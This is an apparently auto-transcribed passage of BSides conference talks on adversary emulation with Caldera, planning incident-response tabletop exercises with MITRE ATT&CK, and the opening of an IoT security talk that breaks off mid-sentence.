if you have this fully um the full session so um maybe that's what I'll do I'll share it with uh with b-sides the full the full version so the next stage of this is adversarial emulation so the ability to act as the adversary itself and I've got a demo here where we use anybody know Caldera there's a bunch of adversarial tools out there right um but anyways I I leveraged Caldera where then now we can look at the ttps the adversary might do so we can create a campaign specifically something that we want to test within our organization to see how our defensive capabilities align to the adversary's ability and so I walk through that where we actually

use Caldera we send out an agent to a couple of boxes I actually have this all built with terraform it's all automatic right I took the time to do it up front did all the programming and now I just go go go go and I can recreate the environment at any time but the point is is that now I can run those campaigns against my defensive tools and understand how the adversary is doing certain elements and then analyze those and either mitigate those those risks that I identify or have confidence that I have mitigating controls in place or detective capabilities to let me know something's happening within the organization so to me me this is where

you start really leveling up because now you're not only you know leveling up from a defensive perspective focusing on ttps not ignoring the other stuff but focusing on ttps as well as really honing in your skills of understanding how the adversary operates I always believe that you know great Defenders really understand the the adversary side of it because if you can think like the adversary then you can put your your you put your feet in their shoes and then you can look at the opportunities within your environment Caldera allows you to do that right it allows you to create those campaigns and run those attacks against your and they could be very very sophisticated like I'm talking about you

know you know 100 different types of activities that might be taking place that you can actually build out hip go it'll go out and do that it'll call back to the CNC server and then even if you have this in a lab environment which you probably want to right this is going to be restricted area in your environment that you're testing in because it is adversarial but then you can say well wait a minute the CNC server was ipx and then you can go in and change the IP right in your controls and then try the attack again that's very trivial right that's that low you know commodity based stuff but the tactic or technique if they need the

right to the registry and you remove that ability or they need to suit them to get root access and you don't allow that you know that that individual to ever do that then they're never ever going to gain that credential and move forward so that that's kind of the the advanced persistent defense capability that that I'm thinking and trying to educate you know us as Defenders that yes there's a lot of great stuff we do but there's a ton of opportunity for us to make it very very difficult for the adversary and it's still awesome well thank you Jason no it's a race thanks so we do have time for one quick question if anybody's got any questions

or if there's a computer expert who knows how to kick it oh no don't don't go to that guy at the back yeah we need somebody to fix my machine sorry was there oh yeah I got a question here there's always one in every crowd guys uh thanks Jason um beautiful talk more on the research side to how you connect the dots so my question is more on how do you commoditize this in a organization which is busy just defending or busy just trying to you know keep the lights on right like this is definitely an A-game whiter framework you get through all this and trying to get in the defender site so just curious on how do you make

it more practical for Defenders to consume it and they're on our own organizations and make it more better yeah I I think that's a great question I think that's the challenge right it's always about keeping the lights on but if it's always about keeping the lights on you're never going to get to these things right um and so you got to make time I mean it's that simple you're gonna make time it's like you're gonna pay me now or pay me later but you're gonna invest time and understanding an adversary or a threat group or threat campaign something somewhere down the line the problem is most likely when you're you have the time to do that guess what

you're faced with an incident because it's actually realized within your organization so now you're taking the time to understand what the adversary is doing and then build in the the mitigating and capabilities and detection response and all that jazz but you've been hit you've been popped right credibility starts to get hit so it comes down to anything like whether you're a networking system storage security you've got to make time that's it you have to say that maybe there's a certain portion of the day or week that you devote to elevating the game and maybe that's the campaign that you do internally but you're right everybody's faced with keeping the lights on but everybody's been doing that forever

it hasn't fared well for any of us right and you're going to give up your time maybe now or you're going to give it up at Christmas like last year right log for Jay oh wait that's tomorrow but yeah it's it's a tough one you got to make the time awesome thank you so much Jason well thank you guys

all right um okay I'll uh I'll introduce Adam McMath our our next uh speaker So Adam is a a multi I was actually really excited to read this because it is one of the funnier bios and very personalized uh Adam is a multi-decade uh infra infosec professional who pays annual maintenance fees on a silly quantity of security and Technology certs and refuses to take himself too seriously Adam's childhood hero is MacGyver the original not the reboot and he has spent his life taking things apart while making the reassembly somebody else's problem Adam is in his glory when situations are the messiest applying lessons from Emergency Services into technology drama with his talk entitled practice makes

perfect testing your incident responses please welcome to the B-side stage Adam McMath

ladies and gentlemen Thomas Matthews [Applause] so I appreciate the opportunity to come hang out with you I apologize my voice is really really trashed because I just had the RSV thing that has been going around the schools and stuff uh I swear I'm no longer contagious or at least I hope it was awful I I couldn't speak for like three days it was gross so the the opportunity for me to come and hang out with you today is just a real treat for me I love besides I I have huge appreciation for harvinder and the Gang who are putting this on please find harvinder and give them a hug give Thomas a hug uh the volunteers thank you

all very much you're you're brilliant and I appreciate the fact that we have such talented and and and professional speakers as well the folks running the CTF are doing a great job thank you being participants here as well you're awesome as well besides doesn't happen without the people showing up and sitting in the chairs so thank you for doing this as well I put this talk together because harvinder said he didn't actually have any interest in my other topic which was about you know the the balance between you know careers and hiring managers there's two million unfilled cyber security jobs yet I know a lot of people who are applying for cyber security jobs and not even getting calls back

we don't want to talk about that apparently because it's too many hard pills to swallow but one of the things that has become more interesting and for some reason why my small advance let me try this again

I plug in the HDMI and everything breaks I'm not going to have to do this old school am I foreign

okay here we go we'll call this character shark boss shark boss just came out of the board meeting and said wow we need and T posing to for for maximum uh maximum you know observation of their superiority over you uh we need a tabletop session you are our information security specialist you have always helped us out in a crisis you should run a tabletop for us and of course you know we come back with a heck no I'm a technologist or what do you mean you want me to run a tabletop who's going to be there you mean the board wants to come or the CFO wants to come so what do we do with that what do we do

with that this is something that as a consultant I'm getting requests on all the time or I'm getting people coming to me personally saying hey Adam I just got this request from my boss that we need to start doing table tops what do I do and the challenge we have in a lot of cases is as you can see that the classic ball and socket the handshake that we one goes for the fist bump and and one goes for the high five and and it's it's it's awful we finally get a tabletop scenario together oh I know let's do ransomware from a phishing email that just locks up all of our stuff and then we don't even know what our instant

response plan is our incident Response Team Our IT team our infosec team looks silly in front of the executives now and nothing good comes of that so I recognize this problem and I thought okay maybe this is an opportunity if I'm not going to tick off people about talking about the hiring problem how about we talk about how to engage our audience inside our organizations a little better right we're finally getting recognized we're finally getting the opportunity to come to the table we have to make sure we don't blow it this is our opportunity to be heroes to be business enablers as Information Security Professionals um so one of the things I wanted to do

first as well is is kind of identify the problem asking the question what what's the problem we're trying to solve here what is the reason for the tabletop to appease the board isn't good enough to appease the executives to get our PCI compliance isn't good enough we have to have a problem to solve and even if we do decide yes we want to play we want to roll the dice and do the Dungeons and dragon style tabletop are we ready do we have an incident response plan do we know what the contents are of so if you go through your cissp materials because we all you know live and eat and Breathe by that book don't we I don't know body of

knowledge some of the Alternatives that are available to you things like knowledge checks if you're doing your cissp exam this could be one of the questions is what alternatives are what kind of Crisis simulations do you have knowledge checks and I actually stole this directly from a slide deck that I did with a client where we had that problem exactly was we have an incident response plan we're not necessarily convinced that the people who are going to be using it actually know the contents so instead of just jumping straight into the big tabletop session with all the people involved we started quizzing the instant response team and you know this is a pretty simple question that like just

simple slide deck in simple animations you start off with the green text you click the mouse the yellow text comes up so what is I guess I'll pull the audience what the instant handling processes from nest 80061r2 A B C or D I personally like C the answer is of course in white underneath right preparation detection analysis containment eradication recovery post incident activities um yeah see his shampoo regardless we can start to before we go in and make the dreaded ball and socket we can arm ourselves with knowledge of the incident response plan that's one of the big findings that comes out of tabletop sessions all the time uh did anybody do the pre-reading no did

anybody know that we have an instant response plan yes did anybody read it no this kind of forces the issue a little bit uh things like checklist tests can also be helpful again different than a tabletop session but this is something that you can use in your organization too if you have an instant response plan is to verify whether or not like you go through your contact list holy crap 25 of these people no longer work here well maybe that checklist will identify for you gaps in your program we talk about Gap analysis a lot this is something that helps you with your Gap analysis structured walk through same sort of idea as a checklist

test but you take your instant response plan and you start running things through it you take your scenarios of phishing email causes ransomware or something wrong with your payment Gateway and start running through your instant response plan providing you have one find gaps and opportunities to make your incident response plan better or as I found in some other tabletop sessions where we start looking and and diving into the organization to understand what we want to be testing sometimes we discover issues with the Protections in the organization those are always lovely uh an RKO out of nowhere doing our technical crisis simulation there are platforms if you have a SIM if you have a sock that you can get those

sock operators if you are a sock operator this stuff is fantastic because it takes you out of the mundane everyday tickets that you are addressing and you can add material into that sock and that Sim that then allows the the The Operators to do cool things see cool things through otherwise they're always looking for it but they never get to experience those technical crisis simulations are phenomenal in that in that Realm because it makes their jobs interesting again and and you can do this as well I I talk to the the dudes from crowdstrike and and tell us thank you to our sponsors as well not that they're listening but but they they are a big

part of b-sides go ask them about this is I happen to be your customer is there something you can do to help me arm my staff with technical things that are cool and and are gonna are gonna help me respond more effectively in a crisis Interruption tests this one is is on your cissp exam I'm curious has anyone here actually done a partial or full Interruption test of any of your production systems how did it go thumbs down so in in Disaster Recovery world and the business continuity world this is something that is always recommended uh I don't know that you will find any I.T Department that will really be willing to let you take down a web part

to see how you respond uh if you and I know very few organizations that really have a non-production system that is a close enough representation of a production system I'm seeing some nods around the room too so this may or may not be be all that effective for it but it was in the book so I thought I'd include it too and by popular demand with Joe mangello hanging out with the kids doing doing Dungeons and Dragons um rolling the dice and and actually going through the the scenarios and letting people walk through the scenarios does have incredible value it really does uh I always just simply recommend first make sure that the classic lawyer scenario know what the

answer to the question is going to be before you ask it so now that we've gone through that every session comes at a cost every tabletop session you offer comes at a cost whether that's your planning time whether that's the the time in the session in the tabletop session and people are judging you people are judging everyone all the time you know my my teenage kids say that to me all the time don't judge dad and what do they do in the whole time they're judging planning time I had a I had an executive come to me I guess this was probably five years ago and said Adam it's time we're doing tabletop sessions every every quarter make it happen my

response was great can you give me a quarter FTE to make that happen because tabletop sessions do not come out of nowhere and the real meat of of the presentation is all about that proper prior planning prevents poor performance if you don't plan out your sessions whether that's your checklist tests your structured walkthroughs anything else your tabletop sessions if you don't plan them out right they will fail and that does not help you keep your seat at the big kids table session time two if you get the executives into your room do yourself a favor and I guess stress yourself out do a calculation based on what you think their salary is you take their salary

you divide it by 2 000 and that's about what each of those people in the room costs per hour if you're doing a four hour tabletop session with eight Executives in that room you can be sitting at twenty thirty thousand dollars an hour worth of other people's times Make It Count and the Judgment time too you are judged for the quality of the session you're delivering you are your team members if you were if you were facilitating this four-year team your team members are being judged by their ability to respond the teams that come to the table with you whether that's the corporate lawyer or whether that's the CFO uh are judging each other about how well they can interact as a

team too so here we go build a plan and I'm just looking at my time oh I'm good I got lots of time what I did for the sake of fun and debauchery and I'm going to see if I can do this without breaking my computer or the big screen aren't those screens lovely oh it worked hold on oh I gotta do this but it's gonna be tricky so Mission critical.ca it's my personal website it's WordPress please don't hack me because as I was you know building this page on my own website last night I found SSL problems I'll fix them tonight I promise um but just whenever I do something like this I try

to put a little bit of material that people can go and consume and read after the fact what I did is I put together a blank tabletop plan and it is not the one that I use in my professional practice to actually deliver table tops but it's awfully similar it's the same thing that I was using when I was in emergency services and we're we're leading people through uh like the town was on fire kind of disaster scenarios uh it's the stuff that I've used inside of uh large municipalities to lead them through privacy breach scenarios things like that uh a blank tabletop report we'll talk about that and a couple of things here too underneath that miter attack

Navigator and miter groups okay Scott Taylor talked about miter attack framework uh Jason Maynard talked about Minor attack framework Adam McMath talking about Minor attack framework Vivek I think is up next I don't know where you are Vivek I bet he'll mention minor attack framework yet when Jason asks the question about how many people are using it in the organization of their daily lives there weren't a whole lot of hands going up so I'll show you a couple things really quick and dirty and easy that that may give you some some other reasons to start using it in your organization and to start using it for things like Crisis simulations that will that will that

will help um and one of the things that I put up there as well and I'm going to talk about that right now and I I'm just guessing because I'm looking at this very sideways attack IQ and I'm not trying to astro turf so I'm not you know beating up the The Rules of Engagement for b-sides um but if you're looking for some training on minor attack framework how to use the minor groups how to use the miter attack Navigator and there's a link to that in my little silly web page too um it's free education it's free training things like how to how to navigate the miter groups how to use the miter attack Navigator

it's all free you all need cpes for all your search anyways consider it so attack IQ Academy dot attack IQ is is a really good way to look at some of that but the first thing I wanted to take a look through again proper prior planning prevents poor performance uh and this is all very basic just text on page you can grab the PDF yourself if you want it if you don't it's up to you um but a tabletop plan so how do you plan out your tabletop session and there's a set of things that we can do to help us really understand what we're going to deliver how we're going to engage our audience and it all starts

with a purpose and I gave I gave some hints and stuff in there too um we want this to be specific and relevant to your audience using Thomas as an example he works in the finance industry I'm just going to go over here to the miter attack groups Jason would have shown you some of this too this is very simple it's uh attacked.miter.org groups or you go to miter.org and you do groups or you use Google and you say miter attack and you don't have to use the Ampersand if you don't want to groups and you'll get to this page and right in here control F Finance this will tell you what miter attract groups are currently attacking or have

in recent history looked at and attacked Finance industry businesses Education Health Care all of these things you can use this resource for free to help you figure out who could be attacking your organization which helps you determine that purpose that purpose what are we trying to do it's not just an unknown attacker that is is is going to just send us a phishing Lincoln okay maybe they will hopefully we have good EDR and all those things that are helping protect us from that but to really understand the motivations of our attackers so that we can deliver that to our audience in a way that is Meaningful and visceral I'm gonna go back to my plan

so the key to your purpose is a decision Point what is the real decision that I want from my Audience by the end at the end of it what is it I'm looking for do I want to pay or not pay a ransom are we going to design a solution by which they can't get out of it without making it pay not pay decision I don't know switching to a different service provider I've seen tabletop session set up specifically for this too is to say that we have only one path of network connectivity into our data center and we need to design a solution that says we need to minimum so you can design your your your your

your purpose around that fire Jim or Adam or whomever right there may be there may be something I just use that flippantly and silly um I I like things like using the formula audience Behavior condition degree that helps you make sure that your purpose is wide enough and Broad enough but also covers all the bases so that you know who your audience is you know what you're trying to solve and you know what the expected behavior is going to be or you know who what when where why how right some examples that I put on there uh Executives will walk through the business impacts of a successful ransomware attack that cannot be recovered from via backups during a

two-hour boardroom session okay that's pretty broad That's a classic executive one um you can if if your audience is not Executives though that wouldn't the IT staff wouldn't care about that one so what can we do with the IT staff let's find out let's go into the minor attack groups what kind of things are happening in our industry the IT team will be tested for their knowledge of the incident response plan using a competitive and fun trivia event one of the things that I didn't put that I had I didn't talk about it on the on the slide about uh doing the the tests is using a kahoot right discovered the demographic you're working with and if they're

collaborative you know get them working together if they are competitive get them competing that's always cool and fun too right uh the online store support team will be tested on their ability to discover analyze contain eradicate and recover from an advanced persistent threat injected into their payment Gateway that's something that could be very interesting to an I.T team but would have no value for executives so your purpose becomes very important because what that leads into is the next section is the objectives specific measurable action oriented realistic and time-bound it this is you know another formula that I like to help me really identify and drill down what we're trying to deliver uh and the key

so they are statements that support your purpose and become your inputs again they start at this high level we don't want a whole lot of detail at this point all we want is objectives the problems that we're going to try to solve or the the uh the questions that we're expecting our audience to answer to create discussion the IT team are presented with a packet capture that indicates industrial process control signals that have been sent from an unexpected host they have five minutes to analyze the information determine if an attacker is present develop collateral you can develop collateral so you can actually and I've done this before too it's it's really cool when you've got

people of a very technical nature in a room and you hand them a piece of paper with pocket capture on it or you say go to this URL or go inside your SharePoint document open this pcap in Wireshark oh you didn't bring your computer well how about that which is where section three comes into play the requirements let your audience know set up ahead of time doing in a boardroom do we need Zoom or teams do we need snacks I need snacks I have a fast metabolism I need to eat all the time but layout those technology requirements again stick your pre-reads in there I don't need everybody to bring the the body of knowledge from ISC squared but

it would sure be lovely if they understood the pre-reads or the incident response plan that way they can't come back at you and say nobody told me right so so putting those together uh safety requirements too in a lot of organizations we have to have stuff like muster zones or things like that yeah stick it in there it's great which then leads to the next section of actually building the plan here's something I really want to touch on and and I'm hoping can can sink in too as you go through this process you're doing that high level creative work you're you're at your emotions you're trying to find ways to emotionally Target your audience and once you get there you can start to

copy paste and there's more copy pasting coming later on here is you know this is your session plan you know now what your requirements are you know what problem you're trying to solve you know how you're going to guide your audience how to solve that you can start building the rest of your material the rest of your collateral to support those objectives stick timing in so that you know that wow we're starting at one o'clock and we're going to go through 15 minutes of facilitation stuff then we're going to go and if this is like a tabletop or something 15 and I'm sorry uh two hours of session time and all your information is there

we're going to wind down the scenario and then we're going to go through post scenario review for a lot of tabletop sessions I've posted I've found that there is good value in one to one we spend an hour in tabletop time we spend an hour in review time let the audience critique themselves bring your own questions to the table open-ended questions so AJ how do you think you guys did right so Tim what did you think about the knowledge of the instant response plan right open-ended questions let them critique themselves that way you don't need to do it but you know what you need to do the whole time take an awful lot of notes

I'll get into that in a second too and then you know really just closing it down having this information set up ahead of time will Aid your facilitation dramatically I think that's the end of that one I'll go back into other things oh when you are creating your collateral when you are creating your inputs when you're creating all your information uh this one here Jason showed you this too miter attack Navigator and if you go through the courses on attack IQ it'll show you how to really use this so say we went over and we found a group once you click on a group it'll also kind of give you some more information underlying about the kind of things oh

Dynamite panda that's a cool name I've never belonged to a club that sounds as cool as Dynamite panda it'll tell you the techniques Jason LED you through ttps tools techniques procedures uh or techniques tactics and procedures sorry the kinds of software they use you can start to dial into this it will show you you know the IDS of the software the IDS of the techniques you could say oh that's uh t108 through three if we decide that file and directory Discovery Well that actually sounds interesting that sounds relevant for my organization you can come back to thee oops minor attack Navigator we're going to just you know simple quick easy dirty I love it we're going to create a new layer for

Enterprise and here's where we find out if my hotspot's still on right so here you're interacting directly with the miter attack Navigator you're interacting directly with the miter attack framework and you can build your threat profile your threat model down from left to right we start with reconnaissance we go to Resource development initial access we can build things especially for a technical team that are realistic that are relevant that are timely all those cool things that we want our audience to be engaged with so that they ask us to come back and we can use things like that I'm just going to turn on the little thing here just because it makes a little easier to

see does anybody remember what I did the search for I can't even see that very well some kind of sideways here where's my search box there it is t1083 I don't know and it'll highlight it for us it's over here somewhere

why isn't it highlighting you know if you go through the the academy.attack IQ stuff it'll tell you how to use it better than I can but it's a great tool that helps us also you know cover our bases because if we get to and I've done this many times too we come up with what sounds like a brilliant threat to brilliant attack surface and then we get to things like defensive Asian and we discover that the organization that we're doing the tabletop test stand actually has technology in place that we would not actually bypass then we have to suspend realism in our listeners we don't want that we don't want any of that that's garbage

okay so I'm gonna go so we have purpose objectives requirements content collateral post analysis I hope that some of this is is interesting and cool that that helps you understand the proper prior planning that can help you deliver a cool and exciting tabletop session because what you want to do is use this plan and if you've got a slide deck that goes along with it great if you've got a kahoot that goes along with it great use your plan that you built as your guide and that'll help you make sure that you're not losing anything behind because when you're doing your facilitation you need to be 50 psychologist you're you're watching the reactions you are having to Pivot you

are having to read the audience in a very visceral way to make sure that you are impacting them effectively you got to be 50 game show host right you really are there in some extent to entertain and 50 scribe okay maybe I didn't do my math very well on that taking notes will be very important again when it comes down to copy paste what is shark boss t-posing shark boss gonna demand of us whether we know it or not they're going to want paperwork they're going to want to report absolutely and you know what I also did on my silly little website here's a tabletop session report very blank very quick if anybody wants the

actual Word documents just I don't know docs me on LinkedIn or something and I'd be happy to pass them along an executive summary fill that out last you know why because you're going to copy paste that from the rest of the document but what you're going to do here section number two what did I do for preparation wait a minute that's all on my plan what did I do for facilitation wait a minute most of that's in my plan what do they do what what were my key findings and recommendations most of that if you did your preparation right is already in your plan the rest is in your notes copy paste make your life easy

especially the reporting piece because I report sucks right and then copy paste everything back into an executive summary at the very beginning very quick very very clean very dirty I love it

the accountability trap and this is my second to last slide I promised Thomas so that we'll be on time look at us go um I've had a few organizations that have come to me and said hey Adam I just bought this really cool Tool uh and and and okay as a consultant I have to put myself in the microscope for this one too I look at at some of the really cool tools out there like immersive labs and it's very expensive and it's got some great kind of scenarios stuff built into it who is overall accountable for the success or failure of your crisis simulation your tabletop session whatever you're doing who's overall accountable you are if shark boss came to you and

said I need you to deliver a tabletop session and it flops and if you've even hired me and it flops yes you never hire me again but what you also do is you damage your own reputation in your in your own organization so don't fall into the Trap that a lot of people do of just farming it out to someone else and expecting it to get done right understand your objectives understand your demographic your audience the objectives you're trying to understand your purpose okay okay oh yeah I want to give a plug to AJ um AJ have a big wave everybody look at AJ point and laugh no I'm kidding um AJ is a friend of mine who is building a

company around doing some of this work and the reason that I wanted to give him a plug is because uh he's doing it right is because he understands and the same way that I do we just have different models of how we go about doing this stuff is is understanding how to get your organization to feel good about its incident responses to feel good and understand how to get better because that's the whole goal cyber security needs to be a business enabler and it would be lovely if we could do that inside crisis simulations instead of active instant response where we've just got an entire database dumped on paste bin so I reach out to reach out to me

and talk about the stuff reach out to AJ talk about the stuff we're we're both you know very much instant response people and and love doing this stuff and what I so I put some silly videos on LinkedIn and this is kind of the tagline that I've used on cyber security shouldn't be scary and we've had a couple of that conversations and I know Robert was trying to hammer that home too fud doesn't work fud has never worked so why don't we do something better than fud how about we do something fun how about we have some fun and deliver some cool things together take our businesses along for a journey and uh and be their guides cyber

security is a business enabler so that's what we did we walked through receiving a request we walk through determining a purpose building a plan facilitating a session building a report that's the end of my slides any questions any thoughts concerns anybody want to call me a donkey I'm uh I'm here for you uh any questions for the Donkey

all right thank you Adam thank you very much [Applause] oh I almost forgot Thomas some say he once lost a kayak in Lake bemeris some say that he once fought a giraffe and won all I know is he's our host Thomas Matthews [Applause] I've never fought in a draft we got about five minutes so feel free to take a quick bio break and then we'll get set up with the next presentation

all right so let's uh just do the introduction here we've got our next speaker Vivek pinoda uh Vivek panoda is an operational technology practitioner with a bachelor's degree in electrical engineering and Global Experience on critical infrastructure projects and currently works at nozomi networks as a regional sales director throughout his career Vivek has held multiple roles including controls engineer sales marketing and development and services covering control systems and cyber Security Solutions for power oil Gas and Water Industries at GE and ICI electrical engineering he is the co-lead for the top 20 secure PLC coding practices project and recent talks contributions include s422 Gartner risk Summit grimcon and b-sides Calgary of course besides Edmonton last year and

isn't it and is it is an active board member of the Mainland Advanced research Society Mars in Vancouver BC he is a member of the ISA and is also a volunteer for isaka so very involved in the cyber security community so with his talk entitled fun times with iot security please welcome to the B-side stage Vivek panoda

all right excellent all that means is I'm old it feels like that's all it meant really all the uh all the lines there but uh today's topic is fun times with iot security so I took the fun part really seriously so I have no content I have a lot of slides and you'll recognize most of them especially if you're Calvin and Hobbs fan you will realize that all of them are Calvin and Hobbs I don't have any content but bear with me I think it'll be a fun conversation so let's start off with the right Calvin hops comment there as you can see I'm setting my expectations low okay that'll always help me if you guys like it great if not

hey I already told you up front Okay and the views are all my own not my company I work for nozomi but um I do a lot of iot security and visibility projects so I attempt to see many of these projects so today we'll talk about what these projects typically start off as and what the missing pieces are and of course thanks to Bill Waterson for all the inspiration so projects initiation so how do these iot projects come around typically as you can see I mean usually the last column in the Calvin hopes column has got a fun closure right so if you see this most projects typically start off because some functionality is missing in

the existing uh either technology or tools or something like that or they need some new thing that came on the market so this new device new widget new software new tool will fix something right or add some functionality so most projects start off with that but of course management doesn't want to spend money right they're always saying hey here's what you got right but most iot projects start because there's some functional requirement then what's the approval process and I'm taking the side of a security guy here okay so most of us here are security people and if someone asks you should we do this should we install TeamViewer should we install this new video camera

should we install this new whatever widget most times our answer is no right because we think it's not secure we think it's not the right implementation or it's not the right fit um so what do users conclude they think that we're not fun the bottom line is they're like man I want to do this but security is always obstructing me next up on the really serious ones we do a risk assessment right so a user comes to us and asks us for something and we say no don't do it and of course we think through we think through all the scenarios and we we told them all the worst things that can happen and they're like man I didn't

realize things were this bad right it's not again going on the theme of or not fun oftentimes when you say no um they're not seeing your intellect they're not seeing your intelligence they're not seeing your hard work behind the know they're only seeing the fact that you said no they wanted to do something and hey I got this cool new iot widget I'm using this at home I want to use it in my workspace and all they hear is you said no now sometimes there's a negotiation involved right in this particular instance for example the user already di